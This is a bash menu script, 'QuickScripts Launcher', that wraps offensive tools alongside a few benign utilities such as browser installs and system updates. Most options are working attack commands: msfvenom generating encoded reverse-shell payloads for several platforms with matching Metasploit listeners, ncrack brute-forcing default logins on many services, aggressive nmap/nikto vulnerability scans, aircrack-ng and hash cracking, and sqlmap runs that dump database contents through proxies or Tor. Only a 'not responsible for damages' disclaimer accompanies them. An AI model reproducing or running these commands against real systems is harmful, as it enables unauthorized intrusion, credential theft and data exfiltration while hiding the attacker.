#!/bin/bash

sudo clear
echo 'QuickScripts Launcher (qsl) by bmixed'
echo -n ' 
QuickScripts
=================
1 - add-repo-qs (Add a repository)
2 - aircrack-qs (Crack a pcap with a wordlist) 
3 - chromium-qs (Install Chromium + privacy extentions)
4 - deps-qs (Install QuickScripts dependancies)
5 - dl-qs (Download a file)
6 - firefox-qs (Install Firefox + privacy addons)
7 - guis-qs (Install GUIs)
8 - hashcracker-qs (Crack a hash)
9 - ip-qs (View your internet IP)
10 - msfpl-qs (Make a Metasploit payload)
11 - ncrack-proxy-qs (Try to crack service logins on a network through a proxy)
12 - ncrack-qs (Try to crack service logins on a network)
13 - scan-qs (Scan a network for services and vulnerabilities)
14 - sqlmap-proxy-qs (Test a site for SQL injection exploits through a proxy)
15 - sqlmap-qs (Test a site for SQL injection exploits)
16 - sqlmap-tor-qs (Test a site for SQL injection exploits through tor)
17 - st-qs (Run a internet speed test)
18 - up-qs (Update your system)
19 - MetaSploit Framework Multi-Generic server

0 - Exit
'
read scr
case $scr in
1)
clear
sudo clear
echo binary [deb/deb-src]:
read bin
echo repository URI:
read repo
echo distrobution:
read dist
echo section:
read sect
echo source list name:
read list
sudo sh -c "echo '$bin $repo $dist $sect' > /etc/apt/sources.list.d/$list.list"
sudo apt update
echo
read -n1
clear
./qsl
;;

2)
clear
echo 'CAPTURE FILE: (pcap,cap,ivs)'
read C
echo 'WORDLIST FILE: (txt,lst,dict)'
read W
echo 'SAVE PASSWORD TO TXT FILE:(~/pw/*filename*.txt)'
read P
aircrack-ng $C -w $W ~/dict/*.txt -l ./pw/$P.txt
echo 'DONE'
read -n1
clear
./qsl
;;

3)
clear
echo 'Installing/Updating Chromium...'
sudo apt install chromium
echo 'Done.'
read -n1
echo 'Loading extensions...'
echo 'Others should auto load from firefox'
chromium https://chrome.google.com/webstore/detail/foxyproxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp?hl=en
echo 'Done.'
read -n1
clear
./qsl
;;

4)
clear
echo 'Installing deps...'
sudo apt install speedtest-cli nmap ncrack aircrack-ng nikto wig sqlmap metasploit-framework framework2
echo 'Done.'
read -n1
clear
./qsl
;;

5)
clear
echo DOWNLOAD LINK:
read dl
wget $dl
echo DONE
read -n1
clear
./qsl
;;

6)
clear
echo 'Installing/Updating Firefox...'
sudo apt install firefox
echo 'Done.'
read  -n1
echo 'Loading Firefox addons...'
firefox https://addons.mozilla.org/firefox/downloads/file/3476518/foxyproxy_standard-7.4.3-an+fx.xpi?src=dp-btn-primary https://addons.mozilla.org/firefox/downloads/file/3541312/ublock_origin-1.26.0-an+fx.xpi?src=dp-btn-primary https://addons.mozilla.org/firefox/downloads/file/3509922/privacy_badger-2020.2.19-an+fx.xpi?src=dp-btn-primary https://addons.mozilla.org/firefox/downloads/file/3528100/https_everywhere-2020.3.16-an+fx.xpi?src=dp-btn-primary
echo 'Done.'
read -n1
clear
./qsl
;;

7)
clear
echo 'Installing/Updating GUIs...'
sudo apt install zenmap legion jsql armitage zaproxy beef-xss set
echo 'Done.'
read -n1
clear
./qsl
;;

8)
clear
echo Hash cracker
echo Algorithm:
read algo
echo Hash:
read hash
findmyhash $algo -h $hash
read -n1
clear
./qsl
;;

9)
clear
curl ifconfig.me
echo
read -n1
clear
./qsl
;;

10)
clear
clear
echo "UPDATED 2019-5-16"
echo "MSFPL "
echo "HOST (DDNS):"
read HOST
echo "PORT:"
read PORT
clear
echo "MSFPL "
echo -n "TARGET OS:
1 - WINDOWS
2 - MAC
3 - LINUX
4 - ANDROID
5 - PHP
6 - ASP
7 - JSP
8 - WAR
9 - HTA
0 - EXIT"
echo 
read OS
clear
echo "MSFPL "
case $OS in
1)
    msfvenom -p windows/meterpreter/reverse_tcp LHOST="$HOST" LPORT=$PORT -b "\x00" -e x86/shikata_ga_nai R> pl.exe

msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;  set lhost $HOST ; set lport $PORT ; exploit ;"

bash msfpl.sh
;;

2) 
    msfvenom -p osx/x86/shell_reverse_tcp LHOST=$HOST LPORT=$PORT -b "\x00" -e x86/shikata_ga_nai R> pl.jar

msfconsole -q -x " use exploit/multi/handler; set payload osx/x86/shell_reverse_tcp;  set lhost $HOST ; set lport $PORT ; exploit ;"

bash msfpl.sh
;;

3)
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$HOST LPORT=$PORT -b "\x00" -e x86/shikata_ga_nai R> pl.py

msfconsole -q -x " use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp;  set lhost $HOST ; set lport $PORT ; exploit ;"

bash msfpl.sh
;;

4)
    msfvenom -p android/meterpreter/reverse_tcp LHOST=$HOST LPORT=$PORT   R> pl.apk

msfconsole -q -x " use exploit/multi/handler; set payload android/meterpreter/reverse_tcp;  set lhost $HOST; set lport $PORT; exploit ;"

bash msfpl.sh
;;

5)
    msfvenom -p php/meterpreter_reverse_tcp LHOST=$HOST LPORT=$PORT  -e x86/shikata_ga_nai R> pl.php

msfconsole -q -x " use exploit/multi/handler; set payload php/meterpreter_reverse_tcp;  set lhost $HOST ; set lport $PORT ; exploit ;"

bash msfpl.sh
;;

6)
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=$HOST LPORT=$PORT -b "\x00" -e x86/shikata_ga_nai R> pl.asp

msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;  set lhost $HOST ; set lport $PORT ; exploit ;"

bash msfpl.sh
;;

7)
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=$HOST LPORT=$PORT -b "\x00" -e x86/shikata_ga_nai R> pl.jsp

msfconsole -q -x " use exploit/multi/handler; set payload java/jsp_shell_reverse_tcp;  set lhost $HOST ; set lport $PORT ; exploit ;"

bash msfpl.sh
;;

8)
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=$HOST LPORT=$PORT -b "\x00" -e x86/shikata_ga_nai -f war > pl.war

msfconsole -q -x " use exploit/multi/handler; set payload java/jsp_shell_reverse_tcp;  set lhost $HOST ; set lport $PORT ; exploit ;"

bash msfpl.sh
;;

9)
    msfconsole -q -x " use exploit/windows/misc/hta_server; set srvhost $HOST; set srvport 80; set uripath /; set payload windows/meterpreter/reverse_tcp; set lhost $HOST ; set lport $PORT; exploit ;"

bash msfpl.sh
;;

0)
clear
exit
;;

*)
clear
echo "Invalid input" 
bash msfpl.sh
;;
esac
clear
./qsl
;;

11)
clear
echo 'PROXY: [socks4,4a,http(s)]://[proxy]:[port]'
read p
echo 'TARGET:'
read x
echo 'Checking' $x 'for deafult logins...'
ncrack -v --proxy $p -p http,https,ftp,smb,telnet,ssh,rdp,vnc --user admin,root --pass admin,password,pass $x
echo 'Done.'
read -n1
clear
./qsl
;;

12)
clear
echo 'TARGET:'
read x
echo 'Checking' $x 'for deafult logins...'
ncrack -v -p http,https,ftp,smb,telnet,ssh,rdp,vnc --user admin,root --pass admin,password,pass $x
echo 'Done.'
read -n1
clear
./qsl
;;

13)
clear
echo Target:
read x
echo
echo Running Nmap scan...
sudo nmap -A -v -sV -sC -Pn --script vulners,http-sql-injection,http-unsafe-output-escaping,http-enum.nse --script-updatedb $x
echo 
echo Running Nikto scan...
nikto -Plugins auth,cgi,tests -host $x 
echo
echo Running Wig scan...
wig $x
echo
echo DONE
read -n1
clear
./qsl
;;

14)
clear
echo Sqlmap-QS by @bmixed
echo Disclaimer:
echo "You know the drill, Im not responsible for damages."
echo -@bmixed
echo Sqlmap-QS-proxy
echo Proxy address:
read proxy
echo Target URL:
read url
sqlmap -u "$url" -dbs --eta '--beep' --smart -o --level=5 --risk=3 --threads=10 --random-agent --proxy=$proxy
echo Databases:
read db
sqlmap -u "$url" -D $db -tables --eta '--beep'  --smart -o --level=5 --risk=3 --threads=10 --random-agent --proxy=$proxy
echo Tables:
read tab
sqlmap -u "$url" -D $db -T $tab -columns --eta '--beep' --smart -o --level=5 --risk=3 --threads=10 --random-agent --proxy=$proxy
echo Colums:
read col
sqlmap -u "$url" -D $db -T $tab -C $col --eta '--beep' --smart -o --level=5 --risk=3 --threads=10 --random-agent --dump --proxy=$proxy
read -n1
clear
./qsl
;;

15)
clear
echo Sqlmap-QS by @bmixed
echo Disclaimer:
echo "You know the drill, Im not responsible for damages."
echo -@bmixed
echo Sqlmap-QS
echo Target URL:
read url
sqlmap -u "$url" -dbs --eta '--beep' --smart -o --level=5 --risk=3 --threads=10 --random-agent
echo Databases:
read db
sqlmap -u "$url" -D $db -tables --eta '--beep'  --smart -o --level=5 --risk=3 --threads=10 --random-agent
echo Tables:
read tab
sqlmap -u "$url" -D $db -T $tab -columns --eta '--beep' --smart -o --level=5 --risk=3 --threads=10 --random-agent
echo Colums:
read col
sqlmap -u "$url" -D $db -T $tab -C $col --eta '--beep' --smart -o --level=5 --risk=3 --threads=10 --random-agent --dump
read -n1
clear
./qsl
;;

16)
clear
echo Sqlmap-QS by @bmixed
echo Disclaimer:
echo "You know the drill, Im not responsible for damages."
echo -@bmixed
echo Sqlmap-QS-Tor
echo Proxy needs to be set to SOCKS5
echo Tor port:
read port
echo Target URL:
read url
sqlmap -u "$url" -dbs --eta '--beep' --smart -o --level=5 --risk=3 --threads=10 --random-agent --tor --tor-port=$port --tor-type=SOCKS5 --check-tor
echo Databases:
read db
sqlmap -u "$url" -D $db -tables --eta '--beep'  --smart -o --level=5 --risk=3 --threads=10 --random-agent --tor --tor-port=$port --tor-type=SOCKS5 --check-tor
echo Tables:
read tab
sqlmap -u "$url" -D $db -T $tab -columns --eta '--beep' --smart -o --level=5 --risk=3 --threads=10 --random-agent --tor --tor-port=$port --tor-type=SOCKS5 --check-tor
echo Colums:
read col
sqlmap -u "$url" -D $db -T $tab -C $col --eta '--beep' --smart -o --level=5 --risk=3 --threads=10 --random-agent --dump --tor --tor-port=$port --tor-type=SOCKS5 --check-tor
read -n1
clear
./qsl
;;

17)
clear
echo 'Running speedtest (speedtest-cli)...'
speedtest
echo Done.
read -n1
clear
./qsl
;;

18)
clear
echo 'Updating & Upgrading...'
sudo apt update
sudo apt upgrade
sudo apt autoremove
sudo apt update
echo 'Done.'
read -n1
clear
./qsl
;;

19)
clear
echo "MSF multi-gen listener"
echo               "-@bmixed"
echo "LHOST:"
read lhst
echo "LPORT:"
read lprt
msfconsole -q -x "use exploit/multi/handler; set TARGET 0; set PAYLOAD generic/shell_reverse_tcp;  set ExitOnSession false; set DisablePayloadHandler false; set lhost $lhst; set lport $lprt; exploit -j;"
echo "Done."
read -n1
clear
./qsl
;;

0)
clear
exit
;;

*)
clear
echo "Invalid input" 
./qsl
;;
esac
